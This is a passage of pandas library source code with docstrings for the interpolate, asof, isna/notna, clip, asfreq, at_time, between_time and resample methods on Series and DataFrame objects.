    "interpolate"
] = """
Please note that only ``method='linear'`` is supported for
DataFrame/Series with a MultiIndex.
Parameters
----------
method : str, default 'linear'
Interpolation technique to use. One of:
* 'linear': Ignore the index and treat the values as equally
spaced. This is the only method supported on MultiIndexes.
* 'time': Works on daily and higher resolution data to interpolate
given length of interval.
* 'index', 'values': use the actual numerical values of the index.
* 'pad': Fill in NaNs using existing values.
* 'nearest', 'zero', 'slinear', 'quadratic', 'cubic', 'spline',
'barycentric', 'polynomial': Passed to
`scipy.interpolate.interp1d`. These methods use the numerical
values of the index. Both 'polynomial' and 'spline' require that
you also specify an `order` (int), e.g.
``df.interpolate(method='polynomial', order=5)``.
* 'krogh', 'piecewise_polynomial', 'spline', 'pchip', 'akima':
Wrappers around the SciPy interpolation methods of similar
names. See `Notes`.
* 'from_derivatives': Refers to
`scipy.interpolate.BPoly.from_derivatives` which
replaces 'piecewise_polynomial' interpolation method in
scipy 0.18.
axis : {0 or 'index', 1 or 'columns', None}, default None
Axis to interpolate along.
limit : int, optional
Maximum number of consecutive NaNs to fill. Must be greater than
0.
inplace : bool, default False
Update the data in place if possible.
limit_direction : {'forward', 'backward', 'both'}, default 'forward'
If limit is specified, consecutive NaNs will be filled in this
direction.
limit_area : {`None`, 'inside', 'outside'}, default None
If limit is specified, consecutive NaNs will be filled with this
restriction.
* ``None``: No fill restriction.
* 'inside': Only fill NaNs surrounded by valid values
(interpolate).
* 'outside': Only fill NaNs outside valid values (extrapolate).
.. versionadded:: 0.23.0
downcast : optional, 'infer' or None, defaults to None
Downcast dtypes if possible.
**kwargs
Keyword arguments to pass on to the interpolating function.
Returns
-------
Series or DataFrame
Returns the same object type as the caller, interpolated at
some or all ``NaN`` values.
See Also
--------
fillna : Fill missing values using different methods.
scipy.interpolate.Akima1DInterpolator : Piecewise cubic polynomials
(Akima interpolator).
scipy.interpolate.BPoly.from_derivatives : Piecewise polynomial in the
Bernstein basis.
scipy.interpolate.interp1d : Interpolate a 1-D function.
scipy.interpolate.KroghInterpolator : Interpolate polynomial (Krogh
interpolator).
scipy.interpolate.PchipInterpolator : PCHIP 1-d monotonic cubic
interpolation.
scipy.interpolate.CubicSpline : Cubic spline data interpolator.
Notes
-----
The 'krogh', 'piecewise_polynomial', 'spline', 'pchip' and 'akima'
methods are wrappers around the respective SciPy implementations of
similar names. These use the actual numerical values of the index.
For more information on their behavior, see the
`SciPy documentation
<https://docs.scipy.org/doc/scipy/reference/interpolate.html#univariate-interpolation>`__
and `SciPy tutorial
<https://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html>`__.
Examples
--------
Filling in ``NaN`` in a :class:`~pandas.Series` via linear
interpolation.
>>> s = pd.Series([0, 1, np.nan, 3])
>>> s
0 0.0
1 1.0
2 NaN
3 3.0
dtype: float64
>>> s.interpolate()
0 0.0
1 1.0
2 2.0
3 3.0
dtype: float64
Filling in ``NaN`` in a Series by padding, but filling at most two
consecutive ``NaN`` at a time.
>>> s = pd.Series([np.nan, "single_one", np.nan,
... "fill_two_more", np.nan, np.nan, np.nan,
... 4.71, np.nan])
>>> s
0 NaN
1 single_one
2 NaN
3 fill_two_more
4 NaN
5 NaN
6 NaN
7 4.71
8 NaN
dtype: object
>>> s.interpolate(method='pad', limit=2)
0 NaN
1 single_one
2 single_one
3 fill_two_more
4 fill_two_more
5 fill_two_more
6 NaN
7 4.71
8 4.71
dtype: object
Filling in ``NaN`` in a Series via polynomial interpolation or splines:
Both 'polynomial' and 'spline' methods require that you also specify
an ``order`` (int).
>>> s = pd.Series([0, 2, np.nan, 8])
>>> s.interpolate(method='polynomial', order=2)
0 0.000000
1 2.000000
2 4.666667
3 8.000000
dtype: float64
Fill the DataFrame forward (that is, going down) along each column
using linear interpolation.
Note how the last entry in column 'a' is interpolated differently,
because there is no entry after it to use for interpolation.
Note how the first entry in column 'b' remains ``NaN``, because there
is no entry before it to use for interpolation.
>>> df = pd.DataFrame([(0.0, np.nan, -1.0, 1.0),
... (np.nan, 2.0, np.nan, np.nan),
... (2.0, 3.0, np.nan, 9.0),
... (np.nan, 4.0, -4.0, 16.0)],
... columns=list('abcd'))
>>> df
a b c d
0 0.0 NaN -1.0 1.0
1 NaN 2.0 NaN NaN
2 2.0 3.0 NaN 9.0
3 NaN 4.0 -4.0 16.0
>>> df.interpolate(method='linear', limit_direction='forward', axis=0)
a b c d
0 0.0 NaN -1.0 1.0
1 1.0 2.0 -2.0 5.0
2 2.0 3.0 -3.0 9.0
3 2.0 4.0 -4.0 16.0
Using polynomial interpolation.
>>> df['d'].interpolate(method='polynomial', order=2)
0 1.0
1 4.0
2 9.0
3 16.0
Name: d, dtype: float64
"""
@Appender(_shared_docs["interpolate"] % _shared_doc_kwargs)
def interpolate(
    self,
    method="linear",
    axis=0,
    limit=None,
    inplace=False,
    limit_direction="forward",
    limit_area=None,
    downcast=None,
    **kwargs,
):
    """
    Interpolate values according to different methods.
    """
    inplace = validate_bool_kwarg(inplace, "inplace")

    axis = self._get_axis_number(axis)

    # axis == 1 is implemented by transposing, interpolating along
    # axis 0, and transposing back at the end.
    if axis == 0:
        ax = self._info_axis_name
        _maybe_transposed_self = self
    elif axis == 1:
        _maybe_transposed_self = self.T
        ax = 1

    ax = _maybe_transposed_self._get_axis_number(ax)

    # alt_ax is the axis whose labels drive the interpolation index
    # (the "other" axis for 2-D objects).
    if _maybe_transposed_self.ndim == 2:
        alt_ax = 1 - ax
    else:
        alt_ax = ax

    if isinstance(_maybe_transposed_self.index, MultiIndex) and method != "linear":
        raise ValueError(
            "Only `method=linear` interpolation is supported on MultiIndexes."
        )

    # All-object columns cannot be interpolated numerically.
    if _maybe_transposed_self._data.get_dtype_counts().get("object") == len(
        _maybe_transposed_self.T
    ):
        raise TypeError(
            "Cannot interpolate with all object-dtype columns "
            "in the DataFrame. Try setting at least one "
            "column to a numeric dtype."
        )

    # create/use the index
    if method == "linear":
        # prior default
        index = np.arange(len(_maybe_transposed_self._get_axis(alt_ax)))
    else:
        index = _maybe_transposed_self._get_axis(alt_ax)
        methods = {"index", "values", "nearest", "time"}
        is_numeric_or_datetime = (
            is_numeric_dtype(index)
            or is_datetime64_any_dtype(index)
            or is_timedelta64_dtype(index)
        )
        # Index-based methods need a numeric/datetime-like index.
        if method not in methods and not is_numeric_or_datetime:
            raise ValueError(
                "Index column must be numeric or datetime type when "
                f"using {method} method other than linear. "
                "Try setting a numeric or datetime index column before "
                "interpolating."
            )

    if isna(index).any():
        raise NotImplementedError(
            "Interpolation with NaNs in the index "
            "has not been implemented. Try filling "
            "those NaNs before interpolating."
        )
    data = _maybe_transposed_self._data
    new_data = data.interpolate(
        method=method,
        axis=ax,
        index=index,
        limit=limit,
        limit_direction=limit_direction,
        limit_area=limit_area,
        inplace=inplace,
        downcast=downcast,
        **kwargs,
    )

    if inplace:
        if axis == 1:
            # Undo the transpose before writing back in place.
            new_data = self._constructor(new_data).T._data
        self._update_inplace(new_data)
    else:
        res = self._constructor(new_data).__finalize__(self)
        if axis == 1:
            res = res.T
        return res
# ----------------------------------------------------------------------
# Timeseries methods Methods
def asof(self, where, subset=None):
    """
    Return the last row(s) without any NaNs before `where`.
    The last row (for each element in `where`, if list) without any
    NaN is taken.
    In case of a :class:`~pandas.DataFrame`, the last row without NaN
    considering only the subset of columns (if not `None`)
    If there is no good value, NaN is returned for a Series or
    a Series of NaN values for a DataFrame
    Parameters
    ----------
    where : date or array-like of dates
        Date(s) before which the last row(s) are returned.
    subset : str or array-like of str, default `None`
        For DataFrame, if not `None`, only use these columns to
        check for NaNs.
    Returns
    -------
    scalar, Series, or DataFrame
        The return can be:
        * scalar : when `self` is a Series and `where` is a scalar
        * Series: when `self` is a Series and `where` is an array-like,
          or when `self` is a DataFrame and `where` is a scalar
        * DataFrame : when `self` is a DataFrame and `where` is an
          array-like
        Return scalar, Series, or DataFrame.
    See Also
    --------
    merge_asof : Perform an asof merge. Similar to left join.
    Notes
    -----
    Dates are assumed to be sorted. Raises if this is not the case.
    Examples
    --------
    A Series and a scalar `where`.
    >>> s = pd.Series([1, 2, np.nan, 4], index=[10, 20, 30, 40])
    >>> s
    10 1.0
    20 2.0
    30 NaN
    40 4.0
    dtype: float64
    >>> s.asof(20)
    2.0
    For a sequence `where`, a Series is returned. The first value is
    NaN, because the first element of `where` is before the first
    index value.
    >>> s.asof([5, 20])
    5 NaN
    20 2.0
    dtype: float64
    Missing values are not considered. The following is ``2.0``, not
    NaN, even though NaN is at the index location for ``30``.
    >>> s.asof(30)
    2.0
    Take all columns into consideration
    >>> df = pd.DataFrame({'a': [10, 20, 30, 40, 50],
    ...                    'b': [None, None, None, None, 500]},
    ...                   index=pd.DatetimeIndex(['2018-02-27 09:01:00',
    ...                                           '2018-02-27 09:02:00',
    ...                                           '2018-02-27 09:03:00',
    ...                                           '2018-02-27 09:04:00',
    ...                                           '2018-02-27 09:05:00']))
    >>> df.asof(pd.DatetimeIndex(['2018-02-27 09:03:30',
    ...                           '2018-02-27 09:04:30']))
    a b
    2018-02-27 09:03:30 NaN NaN
    2018-02-27 09:04:30 NaN NaN
    Take a single column into consideration
    >>> df.asof(pd.DatetimeIndex(['2018-02-27 09:03:30',
    ...                           '2018-02-27 09:04:30']),
    ...         subset=['a'])
    a b
    2018-02-27 09:03:30 30.0 NaN
    2018-02-27 09:04:30 40.0 NaN
    """
    if isinstance(where, str):
        where = Timestamp(where)

    if not self.index.is_monotonic:
        raise ValueError("asof requires a sorted index")

    # subset only applies to DataFrame; normalize it to a list.
    is_series = isinstance(self, ABCSeries)
    if is_series:
        if subset is not None:
            raise ValueError("subset is not valid for Series")
    else:
        if subset is None:
            subset = self.columns
        if not is_list_like(subset):
            subset = [subset]

    is_list = is_list_like(where)
    if not is_list:
        start = self.index[0]
        if isinstance(self.index, PeriodIndex):
            where = Period(where, freq=self.index.freq)

        # `where` precedes all index labels: nothing to return.
        if where < start:
            if not is_series:
                from pandas import Series

                return Series(index=self.columns, name=where, dtype=np.float64)
            return np.nan

        # It's always much faster to use a *while* loop here for
        # Series than pre-computing all the NAs. However a
        # *while* loop is extremely expensive for DataFrame
        # so we later pre-compute all the NAs and use the same
        # code path whether *where* is a scalar or list.
        # See PR: https://github.com/pandas-dev/pandas/pull/14476
        if is_series:
            loc = self.index.searchsorted(where, side="right")
            if loc > 0:
                loc -= 1

            values = self._values
            # Walk backwards past NaNs to the last valid observation.
            while loc > 0 and isna(values[loc]):
                loc -= 1
            return values[loc]

    if not isinstance(where, Index):
        where = Index(where) if is_list else Index([where])

    # Rows with any NaN (in `subset` for frames) are not eligible.
    nulls = self.isna() if is_series else self[subset].isna().any(1)
    if nulls.all():
        if is_series:
            return self._constructor(np.nan, index=where, name=self.name)
        elif is_list:
            from pandas import DataFrame

            return DataFrame(np.nan, index=where, columns=self.columns)
        else:
            from pandas import Series

            return Series(np.nan, index=self.columns, name=where[0])

    locs = self.index.asof_locs(where, ~(nulls.values))

    # mask the missing
    missing = locs == -1
    data = self.take(locs)
    data.index = where
    data.loc[missing] = np.nan
    return data if is_list else data.iloc[-1]
# ----------------------------------------------------------------------
# Action Methods
# Shared docstring for isna/isnull; %(klass)s filled in via Appender.
_shared_docs[
    "isna"
] = """
Detect missing values.
Return a boolean same-sized object indicating if the values are NA.
NA values, such as None or :attr:`numpy.NaN`, gets mapped to True
values.
Everything else gets mapped to False values. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.isnull : Alias of isna.
%(klass)s.notna : Boolean inverse of isna.
%(klass)s.dropna : Omit axes labels with missing values.
isna : Top-level isna.
Examples
--------
Show which entries in a DataFrame are NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.isna()
age born name toy
0 False True False True
1 False False False False
2 True False False False
Show which entries in a Series are NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.isna()
0 False
1 False
2 True
dtype: bool
"""
@Appender(_shared_docs["isna"] % _shared_doc_kwargs)
def isna(self: FrameOrSeries) -> FrameOrSeries:
    # Delegate to the top-level isna and carry over metadata.
    mask = isna(self)
    return mask.__finalize__(self)
@Appender(_shared_docs["isna"] % _shared_doc_kwargs)
def isnull(self: FrameOrSeries) -> FrameOrSeries:
    # Alias of isna: same top-level isna delegation.
    result = isna(self)
    return result.__finalize__(self)
# Shared docstring for notna/notnull; %(klass)s filled in via Appender.
_shared_docs[
    "notna"
] = """
Detect existing (non-missing) values.
Return a boolean same-sized object indicating if the values are not NA.
Non-missing values get mapped to True. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
NA values, such as None or :attr:`numpy.NaN`, get mapped to False
values.
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.notnull : Alias of notna.
%(klass)s.isna : Boolean inverse of notna.
%(klass)s.dropna : Omit axes labels with missing values.
notna : Top-level notna.
Examples
--------
Show which entries in a DataFrame are not NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.notna()
age born name toy
0 True False True False
1 True True True True
2 False True True True
Show which entries in a Series are not NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.notna()
0 True
1 True
2 False
dtype: bool
"""
@Appender(_shared_docs["notna"] % _shared_doc_kwargs)
def notna(self: FrameOrSeries) -> FrameOrSeries:
    # Delegate to the top-level notna and carry over metadata.
    mask = notna(self)
    return mask.__finalize__(self)
@Appender(_shared_docs["notna"] % _shared_doc_kwargs)
def notnull(self: FrameOrSeries) -> FrameOrSeries:
    # Alias of notna: same top-level notna delegation.
    result = notna(self)
    return result.__finalize__(self)
def _clip_with_scalar(self, lower, upper, inplace: bool_t = False):
    """
    Fast path for clip() with scalar bounds.

    Clips values to ``[lower, upper]`` (either side may be None),
    leaving original NA positions as NaN. Returns the clipped object,
    or None when ``inplace=True``.
    """
    # Neither bound may be NA.
    if (lower is not None and np.any(isna(lower))) or (
        upper is not None and np.any(isna(upper))
    ):
        raise ValueError("Cannot use an NA value as a clip threshold")

    result = self
    # Remember where the input is NA: the comparisons below would
    # replace those positions with the bound, so they are restored
    # to NaN afterwards.
    mask = isna(self.values)

    with np.errstate(all="ignore"):
        if upper is not None:
            subset = self.to_numpy() <= upper
            result = result.where(subset, upper, axis=None, inplace=False)
        if lower is not None:
            subset = self.to_numpy() >= lower
            result = result.where(subset, lower, axis=None, inplace=False)

    if np.any(mask):
        # Re-insert the original missing values.
        result[mask] = np.nan

    if inplace:
        self._update_inplace(result)
    else:
        return result
def _clip_with_one_bound(self, threshold, method, axis, inplace):
    """
    Clip against a single bound (`threshold`).

    `method` is ``self.le`` for an upper bound and ``self.ge`` for a
    lower bound; entries already satisfying the bound, or NA, are kept.
    """
    if axis is not None:
        axis = self._get_axis_number(axis)

    # Plain numeric scalar: reuse the two-sided scalar fast path.
    if is_scalar(threshold) and is_number(threshold):
        if method.__name__ == "le":
            return self._clip_with_scalar(None, threshold, inplace=inplace)
        return self._clip_with_scalar(threshold, None, inplace=inplace)

    # Mask of entries to keep untouched: within the bound, or NA.
    keep_mask = method(threshold, axis=axis) | isna(self)

    # GH #15390
    # `where` needs the threshold as an NDFrame, so wrap list-like
    # thresholds that are not already a Series.
    if (not isinstance(threshold, ABCSeries)) and is_list_like(threshold):
        if isinstance(self, ABCSeries):
            threshold = self._constructor(threshold, index=self.index)
        else:
            threshold = _align_method_FRAME(self, threshold, axis, flex=None)[1]
    return self.where(keep_mask, threshold, axis=axis, inplace=inplace)
def clip(
    self: FrameOrSeries,
    lower=None,
    upper=None,
    axis=None,
    inplace: bool_t = False,
    *args,
    **kwargs,
) -> FrameOrSeries:
    """
    Trim values at input threshold(s).
    Assigns values outside boundary to boundary values. Thresholds
    can be singular values or array like, and in the latter case
    the clipping is performed element-wise in the specified axis.

    Parameters
    ----------
    lower : float or array_like, default None
        Minimum threshold value. All values below this
        threshold will be set to it.
    upper : float or array_like, default None
        Maximum threshold value. All values above this
        threshold will be set to it.
    axis : int or str axis name, optional
        Align object with lower and upper along the given axis.
    inplace : bool, default False
        Whether to perform the operation in place on the data.
        .. versionadded:: 0.21.0
    *args, **kwargs
        Additional keywords have no effect but might be accepted
        for compatibility with numpy.

    Returns
    -------
    Series or DataFrame
        Same type as calling object with the values outside the
        clip boundaries replaced.

    Examples
    --------
    >>> data = {'col_0': [9, -3, 0, -1, 5], 'col_1': [-2, -7, 6, 8, -5]}
    >>> df = pd.DataFrame(data)
    >>> df
    col_0 col_1
    0 9 -2
    1 -3 -7
    2 0 6
    3 -1 8
    4 5 -5
    Clips per column using lower and upper thresholds:
    >>> df.clip(-4, 6)
    col_0 col_1
    0 6 -2
    1 -3 -4
    2 0 6
    3 -1 6
    4 5 -4
    Clips using specific lower and upper thresholds per column element:
    >>> t = pd.Series([2, -4, -1, 6, 3])
    >>> t
    0 2
    1 -4
    2 -1
    3 6
    4 3
    dtype: int64
    >>> df.clip(t, t + 4, axis=0)
    col_0 col_1
    0 6 2
    1 -3 -4
    2 0 3
    3 6 8
    4 5 3
    """
    inplace = validate_bool_kwarg(inplace, "inplace")

    axis = nv.validate_clip_with_axis(axis, args, kwargs)
    if axis is not None:
        axis = self._get_axis_number(axis)

    # GH 17276
    # numpy doesn't like NaN as a clip value
    # so ignore
    # GH 19992
    # numpy doesn't drop a list-like bound containing NaN
    if not is_list_like(lower) and np.any(isna(lower)):
        lower = None
    if not is_list_like(upper) and np.any(isna(upper)):
        upper = None

    # GH 2747 (arguments were reversed)
    if lower is not None and upper is not None:
        if is_scalar(lower) and is_scalar(upper):
            lower, upper = min(lower, upper), max(lower, upper)

    # fast-path for scalars
    if (lower is None or (is_scalar(lower) and is_number(lower))) and (
        upper is None or (is_scalar(upper) and is_number(upper))
    ):
        return self._clip_with_scalar(lower, upper, inplace=inplace)

    # General case: clip one bound at a time.
    result = self
    if lower is not None:
        result = result._clip_with_one_bound(
            lower, method=self.ge, axis=axis, inplace=inplace
        )
    if upper is not None:
        if inplace:
            # inplace clipping already mutated self above; restart
            # from self so the second bound applies to it too.
            result = self
        result = result._clip_with_one_bound(
            upper, method=self.le, axis=axis, inplace=inplace
        )

    return result
# Shared docstring for Series.groupby / DataFrame.groupby; %(klass)s is
# substituted per class via Appender.
_shared_docs[
    "groupby"
] = """
Group %(klass)s using a mapper or by a Series of columns.
A groupby operation involves some combination of splitting the
object, applying a function, and combining the results. This can be
used to group large amounts of data and compute operations on these
groups.
Parameters
----------
by : mapping, function, label, or list of labels
Used to determine the groups for the groupby.
If ``by`` is a function, it's called on each value of the object's
index. If a dict or Series is passed, the Series or dict VALUES
will be used to determine the groups (the Series' values are first
aligned; see ``.align()`` method). If an ndarray is passed, the
values are used as-is determine the groups. A label or list of
labels may be passed to group by the columns in ``self``. Notice
that a tuple is interpreted as a (single) key.
axis : {0 or 'index', 1 or 'columns'}, default 0
Split along rows (0) or columns (1).
level : int, level name, or sequence of such, default None
If the axis is a MultiIndex (hierarchical), group by a particular
level or levels.
as_index : bool, default True
For aggregated output, return object with group labels as the
index. Only relevant for DataFrame input. as_index=False is
effectively "SQL-style" grouped output.
sort : bool, default True
Sort group keys. Get better performance by turning this off.
Note this does not influence the order of observations within each
group. Groupby preserves the order of rows within each group.
group_keys : bool, default True
When calling apply, add group keys to index to identify pieces.
squeeze : bool, default False
Reduce the dimensionality of the return type if possible,
otherwise return a consistent type.
observed : bool, default False
This only applies if any of the groupers are Categoricals.
If True: only show observed values for categorical groupers.
If False: show all values for categorical groupers.
.. versionadded:: 0.23.0
Returns
-------
%(klass)sGroupBy
Returns a groupby object that contains information about the groups.
See Also
--------
resample : Convenience method for frequency conversion and resampling
of time series.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/groupby.html>`_ for more.
"""
def asfreq(
    self: FrameOrSeries,
    freq,
    method=None,
    how: Optional[str] = None,
    normalize: bool_t = False,
    fill_value=None,
) -> FrameOrSeries:
    """
    Convert a time series to the specified frequency.

    The data are conformed to a new index at the requested frequency; no
    aggregation is performed.  Use ``resample`` instead when a summarising
    operation (e.g. ``sum``/``mean``) is needed to represent the data at
    the new frequency.

    Parameters
    ----------
    freq : DateOffset or str
        Target frequency.
    method : {'backfill'/'bfill', 'pad'/'ffill'}, default None
        How to fill holes created by the reindex (pre-existing NaNs are
        left untouched): 'pad'/'ffill' propagates the last valid
        observation forward; 'backfill'/'bfill' uses the next valid one.
    how : {'start', 'end'}, default end
        For PeriodIndex only (see PeriodIndex.asfreq).
    normalize : bool, default False
        Whether to reset the output index to midnight.
    fill_value : scalar, optional
        Value used for holes introduced by upsampling (pre-existing NaNs
        are left untouched).

    Returns
    -------
    converted : same type as caller

    See Also
    --------
    reindex

    Notes
    -----
    Frequency strings are documented in the pandas user guide under
    "offset aliases".

    Examples
    --------
    >>> index = pd.date_range('1/1/2000', periods=4, freq='T')
    >>> series = pd.Series([0.0, None, 2.0, 3.0], index=index)
    >>> df = pd.DataFrame({'s': series})
    >>> df.asfreq(freq='30S', fill_value=9.0)
                           s
    2000-01-01 00:00:00  0.0
    2000-01-01 00:00:30  9.0
    2000-01-01 00:01:00  NaN
    2000-01-01 00:01:30  9.0
    2000-01-01 00:02:00  2.0
    2000-01-01 00:02:30  9.0
    2000-01-01 00:03:00  3.0
    """
    # Delegate to the shared implementation; imported locally (rather than
    # at module level) to avoid a circular import with pandas.core.resample.
    from pandas.core.resample import asfreq as _asfreq

    return _asfreq(
        self,
        freq,
        method=method,
        how=how,
        normalize=normalize,
        fill_value=fill_value,
    )
def at_time(
    self: FrameOrSeries, time, asof: bool_t = False, axis=None
) -> FrameOrSeries:
    """
    Select the values whose timestamps fall exactly at the given time of
    day (e.g. 9:30AM).

    Parameters
    ----------
    time : datetime.time or str
        Time of day to select.
    axis : {0 or 'index', 1 or 'columns'}, default 0
        Axis whose labels are matched against ``time``.

    Returns
    -------
    Series or DataFrame

    Raises
    ------
    TypeError
        If the selected axis is not a :class:`DatetimeIndex`.

    See Also
    --------
    between_time : Select values between particular times of the day.
    first : Select initial periods of time series based on a date offset.
    last : Select final periods of time series based on a date offset.
    DatetimeIndex.indexer_at_time : Get just the index locations for
        values at particular time of the day.

    Examples
    --------
    >>> i = pd.date_range('2018-04-09', periods=4, freq='12H')
    >>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
    >>> ts.at_time('12:00')
                         A
    2018-04-09 12:00:00  2
    2018-04-10 12:00:00  4
    """
    # Default to the stat axis (rows for a DataFrame) when unspecified.
    axis_num = self._get_axis_number(
        self._stat_axis_number if axis is None else axis
    )
    labels = self._get_axis(axis_num)
    try:
        locs = labels.indexer_at_time(time, asof=asof)
    except AttributeError as err:
        # Only DatetimeIndex provides ``indexer_at_time``.
        raise TypeError("Index must be DatetimeIndex") from err
    return self._take_with_is_copy(locs, axis=axis_num)
def between_time(
    self: FrameOrSeries,
    start_time,
    end_time,
    include_start: bool_t = True,
    include_end: bool_t = True,
    axis=None,
) -> FrameOrSeries:
    """
    Select the values whose time of day lies between ``start_time`` and
    ``end_time`` (e.g. 9:00-9:30 AM).

    Setting ``start_time`` later than ``end_time`` selects the times that
    are *not* between the two limits.

    Parameters
    ----------
    start_time : datetime.time or str
        Initial time filter limit.
    end_time : datetime.time or str
        Final time filter limit.
    include_start : bool, default True
        Whether rows matching ``start_time`` exactly are included.
    include_end : bool, default True
        Whether rows matching ``end_time`` exactly are included.
    axis : {0 or 'index', 1 or 'columns'}, default 0
        Axis whose labels are filtered.

    Returns
    -------
    Series or DataFrame
        Data from the original object filtered to the specified range.

    Raises
    ------
    TypeError
        If the selected axis is not a :class:`DatetimeIndex`.

    See Also
    --------
    at_time : Select values at a particular time of the day.
    first : Select initial periods of time series based on a date offset.
    last : Select final periods of time series based on a date offset.
    DatetimeIndex.indexer_between_time : Get just the index locations for
        values between particular times of the day.

    Examples
    --------
    >>> i = pd.date_range('2018-04-09', periods=4, freq='1D20min')
    >>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
    >>> ts.between_time('0:15', '0:45')
                         A
    2018-04-10 00:20:00  2
    2018-04-11 00:40:00  3
    >>> ts.between_time('0:45', '0:15')
                         A
    2018-04-09 00:00:00  1
    2018-04-12 01:00:00  4
    """
    # Default to the stat axis (rows for a DataFrame) when unspecified.
    axis_num = self._get_axis_number(
        self._stat_axis_number if axis is None else axis
    )
    labels = self._get_axis(axis_num)
    try:
        locs = labels.indexer_between_time(
            start_time,
            end_time,
            include_start=include_start,
            include_end=include_end,
        )
    except AttributeError as err:
        # Only DatetimeIndex provides ``indexer_between_time``.
        raise TypeError("Index must be DatetimeIndex") from err
    return self._take_with_is_copy(locs, axis=axis_num)
def resample(
    self,
    rule,
    axis=0,
    closed: Optional[str] = None,
    label: Optional[str] = None,
    convention: str = "start",
    kind: Optional[str] = None,
    loffset=None,
    base: int = 0,
    on=None,
    level=None,
) -> "Resampler":
    """
    Resample time-series data.
    Convenience method for frequency conversion and resampling of time
    series. Object must have a datetime-like index (`DatetimeIndex`,
    `PeriodIndex`, or `TimedeltaIndex`), or pass datetime-like values
    to the `on` or `level` keyword.
    Parameters
    ----------
    rule : DateOffset, Timedelta or str
        The offset string or object representing target conversion.
    axis : {0 or 'index', 1 or 'columns'}, default 0
        Which axis to use for up- or down-sampling. For `Series` this
        will default to 0, i.e. along the rows. Must be
        `DatetimeIndex`, `TimedeltaIndex` or `PeriodIndex`.
    closed : {'right', 'left'}, default None
        Which side of bin interval is closed. The default is 'left'
        for all frequency offsets except for 'M', 'A', 'Q', 'BM',
        'BA', 'BQ', and 'W' which all have a default of 'right'.
    label : {'right', 'left'}, default None
        Which bin edge label to label bucket with. The default is 'left'
        for all frequency offsets except for 'M', 'A', 'Q', 'BM',
        'BA', 'BQ', and 'W' which all have a default of 'right'.
    convention : {'start', 'end', 's', 'e'}, default 'start'
        For `PeriodIndex` only, controls whether to use the start or
        end of `rule`.
    kind : {'timestamp', 'period'}, optional, default None
        Pass 'timestamp' to convert the resulting index to a
        `DateTimeIndex` or 'period' to convert it to a `PeriodIndex`.
        By default the input representation is retained.
    loffset : timedelta, default None
        Adjust the resampled time labels.
    base : int, default 0
        For frequencies that evenly subdivide 1 day, the "origin" of the
        aggregated intervals. For example, for '5min' frequency, base could
        range from 0 through 4. Defaults to 0.
    on : str, optional
        For a DataFrame, column to use instead of index for resampling.
        Column must be datetime-like.
    level : str or int, optional
        For a MultiIndex, level (name or number) to use for
        resampling. `level` must be datetime-like.
    Returns
    -------
    Resampler object
    See Also
    --------
    groupby : Group by mapping, function, label, or list of labels.
    Series.resample : Resample a Series.
    DataFrame.resample: Resample a DataFrame.
    Notes
    -----
    See the `user guide
    <https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#resampling>`_
    for more.
    To learn more about the offset strings, please see `this link
    <https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#dateoffset-objects>`__.
    Examples
    --------
    Start by creating a series with 9 one minute timestamps.
    >>> index = pd.date_range('1/1/2000', periods=9, freq='T')
    >>> series = pd.Series(range(9), index=index)
    >>> series
    2000-01-01 00:00:00    0
    2000-01-01 00:01:00    1
    2000-01-01 00:02:00    2
    2000-01-01 00:03:00    3
    2000-01-01 00:04:00    4
    2000-01-01 00:05:00    5
    2000-01-01 00:06:00    6
    2000-01-01 00:07:00    7
    2000-01-01 00:08:00    8
    Freq: T, dtype: int64
    Downsample the series into 3 minute bins and sum the values
    of the timestamps falling into a bin.
    >>> series.resample('3T').sum()
    2000-01-01 00:00:00     3
    2000-01-01 00:03:00    12
    2000-01-01 00:06:00    21
    Freq: 3T, dtype: int64
    Downsample the series into 3 minute bins as above, but label each
    bin using the right edge instead of the left. Please note that the
    value in the bucket used as the label is not included in the bucket,
    which it labels. For example, in the original series the
    bucket ``2000-01-01 00:03:00`` contains the value 3, but the summed
    value in the resampled bucket with the label ``2000-01-01 00:03:00``
    does not include 3 (if it did, the summed value would be 6, not 3).
    To include this value close the right side of the bin interval as
    illustrated in the example below this one.
    >>> series.resample('3T', label='right').sum()
    2000-01-01 00:03:00     3
    2000-01-01 00:06:00    12
    2000-01-01 00:09:00    21
    Freq: 3T, dtype: int64
    Downsample the series into 3 minute bins as above, but close the right
    side of the bin interval.
    >>> series.resample('3T', label='right', closed='right').sum()
    2000-01-01 00:00:00     0
    2000-01-01 00:03:00     6
    2000-01-01 00:06:00    15
    2000-01-01 00:09:00    15
    Freq: 3T, dtype: int64
    Upsample the series into 30 second bins.
    >>> series.resample('30S').asfreq()[0:5]   # Select first 5 rows
    2000-01-01 00:00:00    0.0
    2000-01-01 00:00:30    NaN
    2000-01-01 00:01:00    1.0
    2000-01-01 00:01:30    NaN
    2000-01-01 00:02:00    2.0
    Freq: 30S, dtype: float64
